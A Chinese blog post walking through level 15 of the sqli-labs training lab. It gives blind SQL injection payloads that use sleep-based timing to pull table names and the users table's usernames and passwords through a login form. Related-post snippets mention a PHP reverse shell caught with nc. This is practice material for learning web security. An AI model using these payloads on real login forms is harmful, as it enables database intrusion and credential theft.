Sqlilabs-15

原創 CrAcKeR-1 2020-07-07 19:34

這一關來到了第 15 關,值得注意的是,這一關是布爾和時間盲注的結合關,很好玩哦~

dae3f1472e129336a4600bdb4587ebb.png

因爲有時間盲注,這裏就直接上菜了,下面是幾個例子

–查表
uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit

–查列
uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit

–查用戶名
uname=admin' and if(ascii(substr((select group_concat(username) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit

–查密碼
uname=admin' and if(ascii(substr((select group_concat(password) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit

也可以像第 8 關那樣寫一個腳本,因爲只要掌握基本原理就可以寫,這裏就不再構造了…

😄

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Sqlilabs-4

http://sqlilabs/Less-4/?id=1 回顯正常 http://sqlilabs/Less-4/?id=1' 回顯正常 http://sqlilabs/Less-4/?id=1" 回顯報錯 報

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-9

第九關是基於時間的盲注,所以這裏放過程圖片沒啥卵用了,直接上payload 思路大致如下: count(*)得到表個數 --> 各個表長度 --> 猜測表名 count(*)得到列個數 --> 各個列長度 --> 猜測列名 得到

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-5

這一節引入了新的概念:雙查詢 其利用的原理就是:有研究人員發現,當聚合函數和分組函數,隨機函數,取整函數聯合使用時會報錯,其報錯內容會將查詢的內容顯示出來。第五關就是基於這個原理。 在這裏先講述幾個概念: 雙查詢:顧名思義就是包

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-16

相較於第 15 關,單引號變成了雙引號 + 括號 –查列 uname=admin") and if(ascii(substr((select group_concat(table_name) from information_s

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-7

題目說是上傳文件,可以上傳一個 php 反彈 shell,kali 開啓 nc 連上就 OK http://sqlilabs/Less-7/?id=1' 回顯報錯 http://sqlilabs/

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-11

從第 11 關開始我們進入了 POST 環節,什麼是 POST ,POST 就是數據從客戶端提交到服務端,例如在這個關卡中,我們就是將用戶名和密碼以表單的形式提交給服務器,然後服務器再進行驗證。 如圖,在 Hackbar 我們

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-10

第 10 關是也基於時間的盲注,跟第 9 關一樣,只不過單引號 ’ 變成了雙引號 " 而已 思路大致如下: count(*)得到表個數 --> 各個表長度 --> 猜測表名 count(*)得到列個數 --> 各個列長度 -->

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-14

這裏來到了第 14 關,題目是個忽悠,說是單引號+括號,整的跟 13 關一樣但其實就是個大忽悠 在 Hackbar 上做注入,這一關 hackbar 又可以用了…這是屬於哪波操作? uname=admin'&passwd=111

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-6

第 6 關跟第 5 關一樣,只不過是單引號換成了雙引號而已 構造 ID 後,顯示的內容爲:You are in… http://sqlilabs/Less-6/?id=1 回顯正常 http://sqlilabs

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-13

還記得第 5 關跟第 6 關的雙查詢注入嗎?(其實本質就是盲注),有了 5 6 關卡的基礎,再來玩 13 關就很輕鬆了… 不過這裏倒是有小小的疑惑…就是 hackbar 在這關沒有效果,必須得在方框內輸入纔可以…payload 我

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-12

這裏到了 12 關,是 11 關的練習版本,只不過是把單引號換成了 雙引號 + 括號,其餘的都是一樣的。 這裏仍然以 hackbar 爲例構造 payload: uname=admin") order by 3#&passwd=

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-17

來到了 17 關,從這關開始剛學習需要藉助源碼來配合學習,本關學習內容是 update 內容 從源碼中可以看到,開發者的意圖流程是: 首先查詢用戶名相匹配的 users 表中 數據,所以這裏如果需要注入首先得有一個在數據庫中已

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-4

http://sqlilabs/Less-4/?id=1 回顯正常 http://sqlilabs/Less-4/?id=1' 回顯正常 http://sqlilabs/Less-4/?id=1" 回顯報錯 報

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-9

第九關是基於時間的盲注,所以這裏放過程圖片沒啥卵用了,直接上payload 思路大致如下: count(*)得到表個數 --> 各個表長度 --> 猜測表名 count(*)得到列個數 --> 各個列長度 --> 猜測列名 得到

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-5

這一節引入了新的概念:雙查詢 其利用的原理就是:有研究人員發現,當聚合函數和分組函數,隨機函數,取整函數聯合使用時會報錯,其報錯內容會將查詢的內容顯示出來。第五關就是基於這個原理。 在這裏先講述幾個概念: 雙查詢:顧名思義就是包

CrAcKeR-1 2020-07-07 19:34:59